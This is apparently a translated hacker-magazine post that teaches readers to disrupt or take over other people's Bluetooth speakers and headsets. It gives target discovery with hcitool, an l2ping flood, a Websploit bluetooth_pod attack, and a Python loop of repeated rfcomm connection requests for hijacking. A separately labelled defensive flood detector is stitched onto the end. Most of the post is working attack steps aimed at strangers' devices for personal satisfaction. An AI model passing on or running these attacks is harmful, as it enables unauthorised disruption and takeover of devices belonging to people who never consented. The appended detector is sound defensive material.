DoS on Bluetooth. We analyze a trick that will help turn off someone else's speaker.

Brother


There are not many things in the world that infuriate almost everyone, without exception. These are the spring and autumn slush, the summer hot-water cut-off and schoolchildren with portable Bluetooth speakers. And while practically nothing can be done about the first two natural disasters, the third can be fought, and almost without breaking the law. How? Let's talk about this.
While modern Wi-Fi routers are capable of filtering unwanted packets, most Bluetooth adapters are, to put it mildly, dumb. By and large, they do not care what packet you send, how big it is, or, even less, how many of them you send. Therefore it is not difficult at all to increase the payload size of a ping packet in Linux to a huge value and then send, say, 1000 of these packets to a device with Bluetooth.

Now, in order. First, we need to find suitable devices within range. To do this, use the command
Code:
$ hcitool scan

As a result of this simple manipulation, you will get a list of available Bluetooth devices with their MAC addresses. If your system does not see the Bluetooth adapter, I recommend installing one of the Bluetooth managers for Linux. In Kali, gnome-bluetooth personally worked for me; it can be installed with the following command:
Code:
$ apt-get install gnome-bluetooth

You can also use the blueman utility:
Code:
$ apt-get install blueman

Having received a list of potential victims, you can deal with their Bluetooth devices in several ways. Let's consider each one separately.

Method one: l2ping

Let's use the following command:
Code:
$ l2ping -i hci0 -s <packet value> -f <MAC_address>

It will generate packets of the size you specified in <packet value> and send them to the MAC address given as <MAC_address>. In the end you will see the following picture: in the terminal the response time gradually increases, and on the attacked device Bluetooth will most likely simply switch off. After a while it will turn back on, but the music will have been interrupted and some satisfaction obtained.

INFO
This scheme works very well when the attacked device (for example, a phone) is connected to a headset or speaker via Bluetooth. After the attack, these two devices will not be able to connect with each other.

Method two: Websploit

There is a more elegant and convenient way to silence the loudspeaker from which the cheerful rap is blasting. Launch the Websploit utility:
Code:
$ websploit

Type the following command in the console:
Code:
$ show modules

It will show us all the modules that this utility works with. There are many components for Wi-Fi, but we are specifically interested in the bluetooth/bluetooth_pod module:
Code:
$ use bluetooth/bluetooth_pod

Now you need to configure all the parameters and specify information about the attacked device:
Code:
$ show options
$ set bdaddr <MAC_address>

To knock out Bluetooth reliably, we will change the size of the packet being sent:
Code:
$ set size 999

All preparatory steps are complete; we can start our "killing machine":
Code:
$ run

In the output we will see exactly the same picture: pings get longer and the music is interrupted. Beautiful!
These two methods will work with almost any Bluetooth speaker, headset or similar device, simply because manufacturers do not release new firmware for them that could filter incoming packets. So if you have a laptop with Linux on board, you can rightly call yourself the scourge of portable speakers.
If the speaker withstands the attack, you can try sending the packets to the phone it is connected to instead. Personally, I tested this method on a fairly powerful portable speaker (JBL Xtreme), and it handled the load more or less. But such an attack knocks out cheap Chinese contraptions at once.

About ready-made jammers

Curious products are sold on the Internet, among them frequency jammers. They usually cost decent money and offer different options. Some can knock out almost all mobile-network, Wi-Fi and Bluetooth signals at once, while others will not even cope with H+.
If you think you really need such a product, then before buying it I strongly recommend that you familiarize yourself with the current legislation. In Russia it is not forbidden to buy and sell jammers, but if you decide to use one, you must register the device with the State Committee for Radio Frequencies. If you are caught using an unregistered device, you will most likely be fined under article 13.4 of the Administrative Code of the Russian Federation. The fine for individuals today is 500 rubles; for legal entities, up to 10 thousand.

We connect to someone else's device

As we already know, primitive speakers and headsets almost never filter the packets we send them. But what happens if we send such a device not just a ping packet with data, but a packet requesting a connection to the device? And not just one.
Not all manufacturers of such headsets have taken care of buffer-overflow protection. If all packets are queued, what happens when there is nowhere left to store requests? The speaker will try to execute the command and flush the buffer.
So we use the standard Bluetooth communication protocol, RFCOMM. But since the utility that controls the protocol will not itself let us send a thousand such requests, we will write a small Python script that automates the process.
Code:
#!/usr/bin/env python
import subprocess

# rfcomm connect <MAC_address> 1: request an RFCOMM connection on channel 1
cmd = ['rfcomm', 'connect', '<MAC_address>', '1']

# Repeat the connection request 1001 times in a row
for i in range(0, 1001):
    subprocess.call(cmd)
print('Connecting...')

Before running the script, we need to find out the MAC address of the device. To do this, we use the already familiar hcitool scan command and insert the resulting address into the script in place of <MAC_address>. Now save the script and run it:
Code:
$ python <FileName>

Whether the script works or not depends on the model of the attacked device, or rather on how fast its buffer fills up. If the buffer fills before it is cleared, the command will be executed and we will be connected to the speaker at the same time as its main user. If the buffer is cleared first, nothing will happen and you will have to restart the script.
If our script completes successfully, we can hold our own disco or shut the device down. My personal experiments with the JBL Xtreme speaker led to its shutdown, but I once managed to hijack a JBL Flip 2 (I don't have it at hand now).
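From the defender's side, both floods this post relies on, the l2ping echo-request flood in method one and the repeated rfcomm connection attempts here, look the same on the wire: a burst of identical requests from one peer address in a short time. The following rate-based detector is an added example, not part of the original post; its trace line format is a constructed simplification, not real btmon or hcidump output, which would need its own parser.

```python
"""Rate-based detector for bursts of L2CAP Echo Requests (what l2ping -f sends)
and RFCOMM connection requests, run over a simplified HCI trace."""
import re
from collections import defaultdict

# Assumed, constructed line format (not real btmon output): "<seconds> <peer address> <event>"
LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<addr>(?:[0-9A-F]{2}:){5}[0-9A-F]{2})\s+(?P<event>.+)$")

def parse_trace(text):
    """Return (timestamp, address, event) tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((float(m["ts"]), m["addr"], m["event"]))
    return events

def detect_floods(events, window=1.0, threshold=20):
    """Group events by (address, event type) and report every key whose count in
    some sliding `window` seconds reaches `threshold`: {(addr, event): peak}."""
    by_key = defaultdict(list)
    for ts, addr, event in events:
        by_key[(addr, event)].append(ts)
    alerts = {}
    for key, stamps in by_key.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # drop events that fell out of the window
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts

def build_sample_trace():
    """Constructed sample: one peer floods, another behaves normally."""
    lines = [f"{i * 4.0:.3f} 11:22:33:44:55:66 L2CAP Echo Request" for i in range(3)]
    lines.append("2.500 11:22:33:44:55:66 RFCOMM Connect Request")
    # Flood: 60 echo requests in half a second, then 40 connects in 0.4 s.
    lines += [f"{5.0 + i * 0.008:.3f} AA:BB:CC:DD:EE:FF L2CAP Echo Request" for i in range(60)]
    lines += [f"{8.0 + i * 0.01:.3f} AA:BB:CC:DD:EE:FF RFCOMM Connect Request" for i in range(40)]
    lines.append("not a trace line, must be ignored")
    return "\n".join(lines)

if __name__ == "__main__":
    for (addr, event), n in sorted(detect_floods(parse_trace(build_sample_trace())).items()):
        print(f"ALERT {addr}: {n} x '{event}' within 1 s")
```

A speaker's firmware cannot run this, but a Linux host with a BlueZ adapter can feed its own HCI trace through the same logic to notice when it, or a paired phone, is being pinged or connected to at an abnormal rate.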